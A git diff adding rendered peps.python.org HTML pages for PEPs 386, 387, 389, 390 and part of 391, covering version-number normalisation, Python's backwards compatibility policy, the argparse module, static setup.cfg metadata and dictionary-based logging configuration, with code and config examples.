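+# 'expr' is the string shown above, repeated so this snippet runs on
+# its own.
+expr = r"""^
+(?P<version>\d+\.\d+)         # minimum 'N.N'
+(?P<extraversion>(?:\.\d+)*)  # any number of extra '.N' segments
+(?:
+    (?P<prerel>[abc]|rc)         # 'a' = alpha, 'b' = beta
+                                 # 'c' or 'rc' = release candidate
+    (?P<prerelversion>\d+(?:\.\d+)*)
+)?
+(?P<postdev>(\.post(?P<post>\d+))?(\.dev(?P<dev>\d+))?)?
+$"""
+
+version_re = re.compile(expr, re.VERBOSE)
+print(version_re.match('1.0a2.dev456').groupdict())
+# {'version': '1.0', 'extraversion': '', 'prerel': 'a',
+#  'prerelversion': '2', 'postdev': '.dev456', 'post': None, 'dev': '456'}
+
+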

Some examples probably make it clearer:

+
>>> from verlib import NormalizedVersion as V
+>>> (V('1.0a1')
+...  < V('1.0a2.dev456')
+...  < V('1.0a2')
+...  < V('1.0a2.1.dev456')
+...  < V('1.0a2.1')
+...  < V('1.0b1.dev456')
+...  < V('1.0b2')
+...  < V('1.0b2.post345')
+...  < V('1.0c1.dev456')
+...  < V('1.0c1')
+...  < V('1.0.dev456')
+...  < V('1.0')
+...  < V('1.0.post456.dev34')
+...  < V('1.0.post456'))
+True
+
+
+

The trailing .dev123 is for pre-releases. The .post123 is for +post-releases – which apparently are used by a number of projects out there +(e.g. Twisted [8]). For example, after a 1.2.0 release there might +be a 1.2.0-r678 release. We used post instead of r because the +r is ambiguous as to whether it indicates a pre- or post-release.

+

.post456.dev34 indicates a dev marker for a post release, that sorts +before a .post456 marker. This can be used to do development versions +of post releases.

+

Pre-releases can use a for “alpha”, b for “beta” and c for +“release candidate”. rc is an alternative notation for “release candidate” +that is added to make the version scheme compatible with Python’s own version +scheme. rc sorts after c:

+
>>> from verlib import NormalizedVersion as V
+>>> (V('1.0a1')
+...  < V('1.0a2')
+...  < V('1.0b3')
+...  < V('1.0c1')
+...  < V('1.0rc2')
+...  < V('1.0'))
+True
+
+
+

Note that c is the preferred marker for third party projects.

+

verlib provides a NormalizedVersion class and a +suggest_normalized_version function.

+
+

NormalizedVersion

+

The NormalizedVersion class is used to hold a version and to compare it with others. It takes as an argument a string containing the representation of the version:

+
>>> from verlib import NormalizedVersion
+>>> version = NormalizedVersion('1.0')
+
+
+

The version can be represented as a string:

+
>>> str(version)
+'1.0'
+
+
+

Or compared with others:

+
>>> NormalizedVersion('1.0') > NormalizedVersion('0.9')
+True
+>>> NormalizedVersion('1.0') < NormalizedVersion('1.1')
+True
+
+
+

A class method called from_parts is available if you want to create an instance by providing the parts that compose the version.

+

Examples

+
>>> version = NormalizedVersion.from_parts((1, 0))
+>>> str(version)
+'1.0'
+
+>>> version = NormalizedVersion.from_parts((1, 0), ('c', 4))
+>>> str(version)
+'1.0c4'
+
+>>> version = NormalizedVersion.from_parts((1, 0), ('c', 4), ('dev', 34))
+>>> str(version)
+'1.0c4.dev34'
+
+
+
+
+

suggest_normalized_version

+

suggest_normalized_version is a function that suggests a normalized version +close to the given version string. If you have a version string that isn’t +normalized (i.e. NormalizedVersion doesn’t like it) then you might be able +to get an equivalent (or close) normalized version from this function.

+

This does a number of simple normalizations to the given string, based +on an observation of versions currently in use on PyPI.

+

Given a dump of those versions on January 6th 2010, the function gave these results for the 8821 distributions then on PyPI:

+
    +
  • 7822 (88.67%) already match NormalizedVersion without any change
  • +
  • 717 (8.13%) match when using this suggestion method
  • +
  • 282 (3.20%) don’t match at all.
  • +
+

The 3.20% of projects that are incompatible with NormalizedVersion and cannot be transformed into a compatible form mostly use date-based version schemes, versions with custom markers, or dummy versions. Examples:

+
    +
  • working proof of concept
  • +
  • 1 (first draft)
  • +
  • unreleased.unofficialdev
  • +
  • 0.1.alphadev
  • +
  • 2008-03-29_r219
  • +
  • etc.
  • +
+

When a tool needs to work with versions, a strategy is to use suggest_normalized_version on the version string. If this function returns None, it means that the provided version is not close enough to the standard scheme. If it returns a version that slightly differs from the original version, it’s a suggested normalized version. Last, if it returns the same string, it means that the version matches the scheme.

+

Here’s an example of usage:

+
>>> from verlib import suggest_normalized_version, NormalizedVersion
+>>> import warnings
+>>> def validate_version(version):
+...     rversion = suggest_normalized_version(version)
+...     if rversion is None:
+...         raise ValueError('Cannot work with "%s"' % version)
+...     if rversion != version:
+...         warnings.warn('"%s" is not a normalized version.\n'
+...                       'It has been transformed into "%s" '
+...                       'for interoperability.' % (version, rversion))
+...     return NormalizedVersion(rversion)
+...
+
+>>> validate_version('2.4-rc1')
+__main__:8: UserWarning: "2.4-rc1" is not a normalized version.
+It has been transformed into "2.4c1" for interoperability.
+NormalizedVersion('2.4c1')
+
+>>> validate_version('2.4c1')
+NormalizedVersion('2.4c1')
+
+>>> validate_version('foo')
+Traceback (most recent call last):
+File "<stdin>", line 1, in <module>
+File "<stdin>", line 4, in validate_version
+ValueError: Cannot work with "foo"
+
+
+
+
+
+

Roadmap

+

Distutils will deprecate its existing version classes in favor of NormalizedVersion. The verlib module presented in this PEP will be renamed to version and placed into the distutils package.

+
+
+

References

+ +
+
+

Acknowledgments

+

Trent Mick, Matthias Klose, Phillip Eby, David Lyon, and many people at Pycon +and Distutils-SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0386.rst

+

Last modified: 2024-12-15 20:57:19 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0387/index.html b/pep-0387/index.html new file mode 100644 index 00000000000..33c7e85d11e --- /dev/null +++ b/pep-0387/index.html @@ -0,0 +1,330 @@ + PEP 387 – Backwards Compatibility Policy | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 387 – Backwards Compatibility Policy

+
+
Author:
+
Benjamin Peterson <benjamin at python.org>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
18-Jun-2009
+
Post-History:
+
19-Jun-2009, +12-Jun-2020, +19-Dec-2022, +16-Jun-2023
+
Replaces:
+
291
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP outlines Python’s backwards compatibility policy.

+
+
+

Rationale

+

As one of the most used programming languages today [1], the +Python core language and its standard library play a critical role in +millions of applications and libraries. This is fantastic. However, it +means the development team must be very careful not to break this +existing 3rd party code with new releases.

+

This PEP takes the perspective that “backwards incompatibility” means +preexisting code ceases to comparatively function after a change. It is +acknowledged that this is not a concrete definition, but the expectation +is people in general understand what is meant by +“backwards incompatibility”, and if they are unsure they may ask the +Python development team and/or steering council for guidance.

+
+
+

Backwards Compatibility Rules

+

This policy applies to all public APIs. These include:

+
    +
  • Syntax and behavior of these constructs as defined by the reference +manual.
  • +
  • The C-API.
  • +
  • Function, class, module, attribute, and method names and types.
  • +
  • Given a set of arguments, the return value, side effects, and raised +exceptions of a function. This does not preclude changes from +reasonable bug fixes.
  • +
  • The position and expected types of arguments and returned values.
  • +
  • Behavior of classes with regards to subclasses: the conditions under +which overridden methods are called.
  • +
  • Documented exceptions and the semantics which lead to their raising.
  • +
  • Exceptions commonly raised in EAFP scenarios.
  • +
+

Others are explicitly not part of the public API. They can change or +be removed at any time in any way. These include:

+
    +
  • Function, class, module, attribute, method, and C-API names and +types that are prefixed by “_” (except special names).
  • +
  • Anything documented publicly as being private. +Note that if something is not documented at all, it is not +automatically considered private.
  • +
  • Imported modules (unless explicitly documented as part of the public API; e.g. importing the bacon module in the spam package does not automatically mean spam.bacon is part of the public API unless it is documented as such).
  • +
  • Inheritance patterns of internal classes.
  • +
  • Test suites. (Anything in the Lib/test directory or test +subdirectories of packages.)
  • +
  • Backward compatibility rules do not apply to any module or API that is +explicitly documented as Provisional per PEP 411.
  • +
+
+

Basic policy for backwards compatibility

+
    +
  • In general, incompatibilities should have a large benefit to breakage ratio, and the incompatibility should be easy to resolve in affected code. For example, adding a stdlib module with the same name as a third party package is generally not acceptable. Adding a method or attribute that conflicts with 3rd party code through inheritance, however, is likely reasonable.
  • +
  • Unless it is going through the deprecation process below, the +behavior of an API must not change in an incompatible fashion +between any two consecutive releases. Python’s yearly release +process (PEP 602) means that the deprecation period must last at +least two years.
  • +
  • Similarly a feature cannot be removed without notice between any two +consecutive releases.
  • +
  • For changes that are unable to raise a deprecation warning, consult +with the steering council.
  • +
  • The steering council may grant exceptions to this policy. In +particular, they may shorten the required deprecation period for a +feature. Exceptions are only granted for extreme situations such as +dangerously broken or insecure features or features no one could +reasonably be depending on (e.g., support for completely obsolete +platforms).
  • +
+
+
+
+

Soft Deprecation

+

A soft deprecation can be used for an API which should no longer be used to write new code, but which remains safe to continue using in existing code. The API remains documented and tested, but will not be developed further (no enhancement).

+

The main difference between a “soft” and a (regular) “hard” deprecation +is that the soft deprecation does not imply scheduling the removal of +the deprecated API.

+

Another difference is that a soft deprecation does not issue a warning: +it’s only mentioned in the documentation, whereas usually a “hard” +deprecation issues a DeprecationWarning warning at runtime. The +documentation of a soft deprecation should explain why the API should be +avoided, and if possible propose a replacement.

+

If the decision is made to deprecate (in the regular sense) a feature +that is currently soft deprecated, the deprecation must follow the +Backwards Compatibility Rules (i.e., there is no exception because +the feature is already soft deprecated).

+
+
+

Making Incompatible Changes

+

Making an incompatible change is a gradual process performed over +several releases:

+
    +
  1. Discuss the change. Depending on the degree of incompatibility, +this could be on the bug tracker, python-dev, python-list, or the +appropriate SIG. A PEP or similar document may be written. +Hopefully users of the affected API will pipe up to comment.
  2. +
  3. Add a warning to the current main branch. If behavior is changing, the API may gain a new function or method to perform the new behavior; old usage should raise the warning. If an API is being removed, simply warn whenever it is entered. DeprecationWarning is the usual warning category to use, but PendingDeprecationWarning may be used in special cases where the old and new versions of the API will coexist for many releases [2]. The warning message should include the release in which the incompatibility is expected to become the default and a link to an issue that users can post feedback to. When feasible, also change typeshed to add the @deprecated decorator (see PEP 702) to the deprecated API, so that users of static type checkers have another way to learn about the deprecation. (A minimal sketch of issuing such a warning appears after this list.)

    For C API, a compiler warning generated by the Py_DEPRECATED macro +is also acceptable.

    +
  4. +
  5. Wait for the warning to appear in at least two minor Python +versions of the same major version, or one minor version in an older +major version (e.g. for a warning in Python 3.10.0, you either wait +until at least Python 3.12 or Python 4.0 to make the change).

    It’s fine to wait more than two releases, for example:

    +
      +
    • If the expected maintenance overhead and security risk of the +deprecated behavior is small (e.g. an old function is reimplemented +in terms of a new, more general one), it can stay indefinitely +(or until the situation changes).
    • +
    • If the deprecated feature is replaced by a new one, it should +generally be removed only after the last Python version +without the new feature reaches end of support.
    • +
    +
  6. +
  7. See if there’s any feedback. Users not involved in the original +discussions may comment now after seeing the warning. Perhaps +reconsider.
  8. +
  9. The behavior change or feature removal may now be made default or +permanent having reached the declared version. Remove the old +version and warning.
  10. +
  11. If a warning cannot be provided to users, consult with the steering +council.
  12. +
+
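
As promised above, a minimal sketch of issuing the warning described in the “add a warning” step (the function names, target release and issue number are placeholders, not prescribed wording):

+
import warnings
+
+def new_function(x):
+    return x
+
+def old_function(x):
+    warnings.warn(
+        "old_function() is deprecated and slated for removal in "
+        "Python 3.XX; use new_function() instead. Feedback: "
+        "https://github.com/python/cpython/issues/NNNNN",
+        DeprecationWarning,
+        stacklevel=2,  # attribute the warning to the caller's call site
+    )
+    return new_function(x)
+
+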
+
+

Changelog

+
    +
  • 2023-Nov-14: Added @deprecated decorator per PEP 702.
  • +
  • 2023-Jul-03: Added the Soft Deprecation section, as discussed in +https://discuss.python.org/t/27957.
  • +
  • 2023-Jun-26: Multiple smaller updates and clarifications, discussed in +https://discuss.python.org/t/22042.
  • +
  • 2022-Apr-04: Added explicit notes to ask the Steering Council +in several exceptional cases.
  • +
  • 2021-Apr-16: Clarified how long a warning must be emitted before +a change can be made.
  • +
  • 2020-Jul-20: Initial accepted version.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0387.rst

+

Last modified: 2024-10-10 20:00:57 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0389/index.html b/pep-0389/index.html new file mode 100644 index 00000000000..a223cab3e6a --- /dev/null +++ b/pep-0389/index.html @@ -0,0 +1,451 @@ + PEP 389 – argparse - New Command Line Parsing Module | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 389 – argparse - New Command Line Parsing Module

+
+
Author:
+
Steven Bethard <steven.bethard at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
25-Sep-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+
27-Sep-2009, 24-Oct-2009
+
+
+
+
Table of Contents +
+
+

Acceptance

+

This PEP was approved by Guido on python-dev on February 21, 2010 [17].

+
+
+

Abstract

+

This PEP proposes inclusion of the argparse [1] module in the Python +standard library in Python 2.7 and 3.2.

+
+
+

Motivation

+

The argparse module is a command line parsing library which provides more functionality than the existing command line parsing modules in the standard library, getopt [2] and optparse [3]. It includes support for positional arguments (not just options), subcommands, required options, option syntaxes like “/f” and “+rgb”, zero-or-more and one-or-more style arguments, and many other features the other two lack.

+

The argparse module is also already a popular third-party replacement +for these modules. It is used in projects like IPython (the Scipy +Python shell) [4], is included in Debian testing and unstable [5], +and since 2007 has had various requests for its inclusion in the +standard library [6] [7] [8]. This popularity suggests it may be +a valuable addition to the Python libraries.

+
+
+

Why aren’t getopt and optparse enough?

+

One argument against adding argparse is that there are “already two different option parsing modules in the standard library” [9]. The following is a list of features provided by argparse but not present in getopt or optparse (a short illustrative sketch follows the list):

+
    +
  • While it is true there are two option parsing libraries, there +are no full command line parsing libraries – both getopt and +optparse support only options and have no support for positional +arguments. The argparse module handles both, and as a result, is +able to generate better help messages, avoiding redundancies like +the usage= string usually required by optparse.
  • +
  • The argparse module values practicality over purity. Thus, argparse +allows required options and customization of which characters are +used to identify options, while optparse explicitly states “the +phrase ‘required option’ is self-contradictory” and that the option +syntaxes -pf, -file, +f, +rgb, /f and /file +“are not supported by optparse, and they never will be”.
  • +
  • The argparse module allows options to accept a variable number of +arguments using nargs='?', nargs='*' or nargs='+'. The +optparse module provides an untested recipe for some part of this +functionality [10] but admits that “things get hairy when you want +an option to take a variable number of arguments.”
  • +
  • The argparse module supports subcommands, where a main command +line parser dispatches to other command line parsers depending on +the command line arguments. This is a common pattern in command +line interfaces, e.g. svn co and svn up.
  • +
+
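
As a rough sketch of the positional-argument, nargs and subcommand support listed above (the command and option names here are invented for illustration):

+
import argparse
+
+parser = argparse.ArgumentParser(prog='vcs')
+subparsers = parser.add_subparsers(dest='command')
+
+# 'co' takes one required positional plus zero-or-more extra paths.
+co = subparsers.add_parser('co')
+co.add_argument('url')               # a positional argument, not an option
+co.add_argument('paths', nargs='*')  # zero-or-more style arguments
+
+# 'up' has a required option -- something optparse refuses to support.
+up = subparsers.add_parser('up')
+up.add_argument('--revision', required=True)
+
+args = parser.parse_args(['co', 'http://example.org/repo', 'a', 'b'])
+print(args.command, args.url, args.paths)
+# co http://example.org/repo ['a', 'b']
+
+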
+
+

Why isn’t the functionality just being added to optparse?

+

Clearly all the above features offer improvements over what is +available through optparse. A reasonable question then is why these +features are not simply provided as patches to optparse, instead of +introducing an entirely new module. In fact, the original development +of argparse intended to do just that, but because of various fairly +constraining design decisions of optparse, this wasn’t really +possible. Some of the problems included:

+
    +
  • The optparse module exposes the internals of its parsing algorithm. +In particular, parser.largs and parser.rargs are guaranteed +to be available to callbacks [11]. This makes it extremely +difficult to improve the parsing algorithm as was necessary in +argparse for proper handling of positional arguments and variable +length arguments. For example, nargs='+' in argparse is matched +using regular expressions and thus has no notion of things like +parser.largs.
  • +
  • The optparse extension APIs are extremely complex. For example, +just to use a simple custom string-to-object conversion function, +you have to subclass Option, hack class attributes, and then +specify your custom option type to the parser, like this:
    class MyOption(Option):
    +    TYPES = Option.TYPES + ("mytype",)
    +    TYPE_CHECKER = copy(Option.TYPE_CHECKER)
    +    TYPE_CHECKER["mytype"] = check_mytype
    +parser = optparse.OptionParser(option_class=MyOption)
    +parser.add_option("-m", type="mytype")
    +
    +
    +

    For comparison, argparse simply allows conversion functions to be +used as type= arguments directly, e.g.:

    +
    parser = argparse.ArgumentParser()
+parser.add_argument("-m", type=check_mytype)
    +
    +
    +

    But given the baroque customization APIs of optparse, it is unclear +how such a feature should interact with those APIs, and it is +quite possible that introducing the simple argparse API would break +existing custom Option code.

    +
  • +
  • Both optparse and argparse parse command line arguments and assign +them as attributes to an object returned by parse_args. +However, the optparse module guarantees that the take_action +method of custom actions will always be passed a values object +which provides an ensure_value method [12], while the argparse +module allows attributes to be assigned to any object, e.g.:
    foo_object = ...
    +parser.parse_args(namespace=foo_object)
    +foo_object.some_attribute_parsed_from_command_line
    +
    +
    +

    Modifying optparse to allow any object to be passed in would be +difficult because simply passing the foo_object around instead +of a Values instance will break existing custom actions that +depend on the ensure_value method.

    +
  • +
+

Because of issues like these, which made it unreasonably difficult +for argparse to stay compatible with the optparse APIs, argparse was +developed as an independent module. Given these issues, merging all +the argparse features into optparse with no backwards +incompatibilities seems unlikely.

+
+
+

Deprecation of optparse

+

Because all of optparse’s features are available in argparse, the +optparse module will be deprecated. However, because of the +widespread use of optparse, the deprecation strategy contains only +documentation changes and warnings that will not be visible by +default:

+
    +
  • Python 2.7+ and 3.2+ – The following note will be added to the +optparse documentation:
    +
    The optparse module is deprecated and will not be developed +further; development will continue with the argparse module.
    +
  • +
  • Python 2.7+ – If the Python 3 compatibility flag, -3, is +provided at the command line, then importing optparse will issue a +DeprecationWarning. Otherwise no warnings will be issued.
  • +
  • Python 3.2+ – Importing optparse will issue a +PendingDeprecationWarning, which is not displayed by default.
  • +
+

Note that no removal date is proposed for optparse.

+
+
+

Updates to getopt documentation

+

The getopt module will not be deprecated. However, its documentation +will be updated to point to argparse in a couple of places. At the +top of the module, the following note will be added:

+
+
The getopt module is a parser for command line options whose API +is designed to be familiar to users of the C getopt function. +Users who are unfamiliar with the C getopt function or who would +like to write less code and get better help and error messages +should consider using the argparse module instead.
+

Additionally, after the final getopt example, the following note will +be added:

+
+
Note that an equivalent command line interface could be produced +with less code by using the argparse module:
import argparse
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-o', '--output')
+    parser.add_argument('-v', dest='verbose', action='store_true')
+    args = parser.parse_args()
+    # ... do something with args.output ...
+    # ... do something with args.verbose ..
+
+
+
+
+
+

Deferred: string formatting

+

The argparse module supports Python from 2.3 up through 3.2 and as a +result relies on traditional %(foo)s style string formatting. It +has been suggested that it might be better to use the new style +{foo} string formatting [13]. There was some discussion about +how best to do this for modules in the standard library [14] and +several people are developing functions for automatically converting +%-formatting to {}-formatting [15] [16]. When one of these is added +to the standard library, argparse will use them to support both +formatting styles.

+
+
+

Rejected: getopt compatibility methods

+

Previously, when this PEP was suggesting the deprecation of getopt +as well as optparse, there was some talk of adding a method like:

+
ArgumentParser.add_getopt_arguments(options[, long_options])
+
+
+

However, this method will not be added for a number of reasons:

+
    +
  • The getopt module is not being deprecated, so there is less need.
  • +
  • This method would not actually ease the transition for any getopt +users who were already maintaining usage messages, because the API +above gives no way of adding help messages to the arguments.
  • +
  • Some users of getopt consider it very important that only a single +function call is necessary. The API above does not satisfy this +requirement because both ArgumentParser() and parse_args() +must also be called.
  • +
+
+
+

Out of Scope: Various Feature Requests

+

Several feature requests for argparse were made in the discussion of +this PEP:

+
    +
  • Support argument defaults from environment variables
  • +
  • Support argument defaults from configuration files
  • +
  • Support “foo --help subcommand” in addition to the currently supported “foo subcommand --help”
  • +
+

These are all reasonable feature requests for the argparse module, +but are out of the scope of this PEP, and have been redirected to +the argparse issue tracker.

+
+
+

Discussion: sys.stderr and sys.exit

+

There were some concerns that argparse by default always writes to +sys.stderr and always calls sys.exit when invalid arguments +are provided. This is the desired behavior for the vast majority of +argparse use cases which revolve around simple command line +interfaces. However, in some cases, it may be desirable to keep +argparse from exiting, or to have it write its messages to something +other than sys.stderr. These use cases can be supported by +subclassing ArgumentParser and overriding the exit or +_print_message methods. The latter is an undocumented +implementation detail, but could be officially exposed if this turns +out to be a common need.

+
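
For example, a sketch of such a subclass (the class name is invented; _print_message is the undocumented hook mentioned above):

+
import argparse
+
+class CapturingParser(argparse.ArgumentParser):
+    """Collect messages instead of writing to sys.stderr, and raise
+    instead of terminating the process."""
+
+    def __init__(self, *args, **kwargs):
+        argparse.ArgumentParser.__init__(self, *args, **kwargs)
+        self.messages = []
+
+    def _print_message(self, message, file=None):
+        if message:
+            self.messages.append(message)
+
+    def exit(self, status=0, message=None):
+        if message:
+            self.messages.append(message)
+        raise RuntimeError('parsing failed with status %d' % status)
+
+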
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0389.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0390/index.html b/pep-0390/index.html new file mode 100644 index 00000000000..6c7ee846825 --- /dev/null +++ b/pep-0390/index.html @@ -0,0 +1,353 @@ + PEP 390 – Static metadata for Distutils | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 390 – Static metadata for Distutils

+
+
Author:
+
Tarek Ziadé <tarek at ziade.org>
+
BDFL-Delegate:
+
Alyssa Coghlan
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
10-Oct-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+

+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a new section and a new format for the setup.cfg file that allow describing the Metadata of a package without using setup.py.

+
+
+

Rejection Notice

+

As distutils2 is no longer going to be incorporated into the standard +library, this PEP was rejected by Alyssa Coghlan in late April, 2013.

+

A replacement PEP based on PEP 426 (metadata 2.0) will be created that +defines the minimum amount of information needed to generate an sdist +archive given a source tarball or VCS checkout.

+
+
+

Rationale

+

Today, if you want to list all the Metadata of a distribution (see PEP 314) +that is not installed, you need to use the setup.py command line interface.

+

So, basically, you download it, and run:

+
$ python setup.py --name
+Distribute
+
+$ python setup.py --version
+0.6.4
+
+
+

Where name and version are metadata fields. This works fine, but as soon as developers add more code to setup.py, this feature might break or, in the worst case, might do unwanted things on the target system.

+

Moreover, when an OS packager wants to get the metadata of a distribution he is re-packaging, he might have trouble understanding the setup.py file he’s working with.

+

So the rationale of this PEP is to provide a way to declare the metadata +in a static configuration file alongside setup.py that doesn’t require +any third party code to run.

+
+
+

Adding a metadata section in setup.cfg

+

The first thing we want to introduce is a [metadata] section, in the +setup.cfg file, that may contain any field from the Metadata:

+
[metadata]
+name = Distribute
+version = 0.6.4
+
+
+

The setup.cfg file is used to avoid adding yet another configuration +file to work with in Distutils.

+

This file is already read by Distutils when a command is executed, and +if the metadata section is found, it will be used to fill the metadata +fields. If an option that corresponds to a Metadata field is given to +setup(), it will override the value that was possibly present in +setup.cfg.

+

Notice that setup.py is still used and can be required to define some +options that are not part of the Metadata fields. For instance, the +sdist command can use options like packages or scripts.

+
+
+

Multi-lines values

+

Some Metadata fields can have multiple values. To keep setup.cfg compatible +with ConfigParser and the RFC 822 LONG HEADER FIELDS (see section 3.1.1), +these are expressed with ,-separated values:

+
requires = pywin32, bar > 1.0, foo
+
+
+

When this variable is read, the values are parsed and transformed into a list: +['pywin32', 'bar > 1.0', 'foo'].

+
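
A sketch of that transformation (this is not the actual Distutils parsing code):

+
value = 'pywin32, bar > 1.0, foo'
+requires = [chunk.strip() for chunk in value.split(',')]
+# ['pywin32', 'bar > 1.0', 'foo']
+
+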
+
+

Context-dependant sections

+

The metadata section will also be able to use context-dependant sections.

+

A context-dependant section is a section with a condition about the execution environment. Here are some examples:

+
[metadata]
+name = Distribute
+version = 0.6.4
+
+[metadata:sys_platform == 'win32']
+requires = pywin32, bar > 1.0
+obsoletes = pywin31
+
+[metadata:os_machine == 'i386']
+requires = foo
+
+[metadata:python_version == '2.4' or python_version == '2.5']
+requires = bar
+
+[metadata:'linux' in sys_platform]
+requires = baz
+
+
+

Every [metadata:condition] section will be used only if the condition is met when the file is read. The background motivation for these context-dependant sections is to be able to define requirements that vary depending on the platform the distribution might be installed on (see PEP 314).

+

The micro-language behind this is the simplest possible: it compares only strings, with the == and in operators (and their opposites), and with the ability to combine expressions. This also makes it easy for non-Pythoneers to understand.

+

The pseudo-grammar is

+
EXPR [in|==|!=|not in] EXPR [or|and] ...
+
+
+

where EXPR belongs to any of those:

+
    +
  • python_version = ‘%s.%s’ % (sys.version_info[0], sys.version_info[1])
  • +
  • os_name = os.name
  • +
  • sys_platform = sys.platform
  • +
  • platform_version = platform.version()
  • +
  • platform_machine = platform.machine()
  • +
  • a free string, like 2.4, or win32
  • +
+

Notice that in is restricted to strings, meaning that it is not possible +to use other sequences like tuples or lists on the right side.

+
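
Since the micro-language happens to be a subset of Python expressions over these names, a naive sketch of condition evaluation could look like this (a real implementation would parse the grammar rather than call eval()):

+
import os
+import platform
+import sys
+
+environment = {
+    'python_version': '%s.%s' % (sys.version_info[0], sys.version_info[1]),
+    'os_name': os.name,
+    'sys_platform': sys.platform,
+    'platform_version': platform.version(),
+    'platform_machine': platform.machine(),
+}
+
+def evaluate(condition):
+    # Restrict eval() to the marker variables only.
+    return bool(eval(condition, {'__builtins__': {}}, dict(environment)))
+
+print(evaluate("sys_platform == 'win32'"))
+print(evaluate("python_version == '2.4' or python_version == '2.5'"))
+
+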

Distutils will provide a function that is able to generate the metadata +of a distribution, given a setup.cfg file, for the execution environment:

+
>>> from distutils.util import local_metadata
+>>> local_metadata('setup.cfg')
+<DistributionMetadata instance>
+
+
+

This means that a vanilla Python will be able to read the metadata of a +package without running any third party code.

+

Notice that this feature is not restricted to the metadata namespace. +Consequently, any other section can be extended with such context-dependant +sections.

+
+
+

Impact on PKG-INFO generation and PEP 314

+

When PKG-INFO is generated by Distutils, every field that relies on a +condition will have that condition written at the end of the line, after a +; separator:

+
Metadata-Version: 1.2
+Name: distribute
+Version: 0.6.4
+...
+Requires: pywin32, bar > 1.0; sys_platform == 'win32'
+Requires: foo; os_machine == 'i386'
+Requires: bar; python_version == '2.4' or python_version == '2.5'
+Requires: baz; 'linux' in sys_platform
+Obsoletes: pywin31; sys_platform == 'win32'
+...
+Classifier: Development Status :: 5 - Production/Stable
+Classifier: Intended Audience :: Developers
+Classifier: License :: OSI Approved :: Python Software Foundation License
+
+
+

Notice that this file can be opened with the DistributionMetadata class. +This class will be able to use the micro-language using the execution +environment.

+

Let’s run it on a Python 2.5 i386 Linux:

+
>>> from distutils.dist import DistributionMetadata
+>>> metadata = DistributionMetadata('PKG_INFO')
+>>> metadata.get_requires()
+['foo', 'bar', 'baz']
+
+
+

The execution environment can be overridden in case we want to get the metadata +for another environment:

+
>>> env = {'python_version': '2.4',
+...        'os_name': 'nt',
+...        'sys_platform': 'win32',
+...        'platform_version': 'MVCC++ 6.0',
+...        'platform_machine': 'i386'}
+...
+>>> metadata = DistributionMetadata('PKG_INFO', environment=env)
+>>> metadata.get_requires()
+['bar > 1.0', 'foo', 'bar']
+
+
+

PEP 314 is changed accordingly, meaning that each field will be able to +have that extra condition marker.

+
+
+

Compatibility

+

This change is based on a new metadata 1.2 format meaning that +Distutils will be able to distinguish old PKG-INFO files from new ones.

+

The setup.cfg file change will stay ConfigParser-compatible and +will not break existing setup.cfg files.

+
+
+

Limitations

+

We are not providing < and > operators at this time, and python_version is a regular string. This implies using or operators when a section needs to be restricted to a couple of Python versions. However, if PEP 386 is accepted, python_version could be changed internally into something comparable with strings, and the < and > operators introduced.

+

Last, if a distribution is unable to set all metadata fields in setup.cfg, that’s fine: the fields will be set to UNKNOWN when local_metadata is called. Getting UNKNOWN values means that it might be necessary to run the setup.py command line interface to get the whole set of metadata.

+
+
+

Acknowledgments

+

The Distutils-SIG.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0390.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0391/index.html b/pep-0391/index.html new file mode 100644 index 00000000000..8db9e172425 --- /dev/null +++ b/pep-0391/index.html @@ -0,0 +1,758 @@ + PEP 391 – Dictionary-Based Configuration For Logging | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 391 – Dictionary-Based Configuration For Logging

+
+
Author:
+
Vinay Sajip <vinay_sajip at red-dove.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
15-Oct-2009
+
Python-Version:
+
2.7, 3.2
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a new way of configuring logging using a dictionary +to hold configuration information.

+
+
+

Rationale

+

The present means for configuring Python’s logging package is either +by using the logging API to configure logging programmatically, or +else by means of ConfigParser-based configuration files.

+

Programmatic configuration, while offering maximal control, fixes the configuration in Python code. This does not facilitate changing it easily at runtime, and, as a result, the ability to flexibly turn the verbosity of logging up and down for different parts of an application is lost. This limits the usability of logging as an aid to diagnosing problems - and sometimes, logging is the only diagnostic aid available in production environments.

+

The ConfigParser-based configuration system is usable, but does not +allow its users to configure all aspects of the logging package. For +example, Filters cannot be configured using this system. Furthermore, +the ConfigParser format appears to engender dislike (sometimes strong +dislike) in some quarters. Though it was chosen because it was the +only configuration format supported in the Python standard at that +time, many people regard it (or perhaps just the particular schema +chosen for logging’s configuration) as ‘crufty’ or ‘ugly’, in some +cases apparently on purely aesthetic grounds.

+

Recent versions of Python include JSON support in the standard +library, and this is also usable as a configuration format. In other +environments, such as Google App Engine, YAML is used to configure +applications, and usually the configuration of logging would be +considered an integral part of the application configuration. +Although the standard library does not contain YAML support at +present, support for both JSON and YAML can be provided in a common +way because both of these serialization formats allow deserialization +to Python dictionaries.

+

